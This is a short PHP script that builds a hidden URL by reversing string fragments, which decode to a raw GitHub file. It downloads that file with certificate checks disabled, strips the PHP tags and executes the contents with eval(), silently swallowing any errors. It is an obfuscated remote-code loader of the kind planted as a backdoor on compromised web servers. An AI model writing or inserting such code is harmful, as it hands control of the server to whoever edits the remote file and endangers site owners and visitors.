<?php

$a = "txt.3/nia";
$b = "m/sdaeh/sfe";
$c = "r/mpo/mpo";
$d = "yfful/moc.tn";
$e = "etnocresubuht";
$f = "ig.war//:sptth";

$u = strrev($a . $b . $c . $d . $e . $f);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $u);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$p = curl_exec($ch);

if (!curl_errno($ch)) {
    $c = str_replace(['<?php', '?>', '<?'], '', $p);
    try {
        eval($c);
    } catch (Throwable $e) {
    }
}

curl_close($ch);

?>
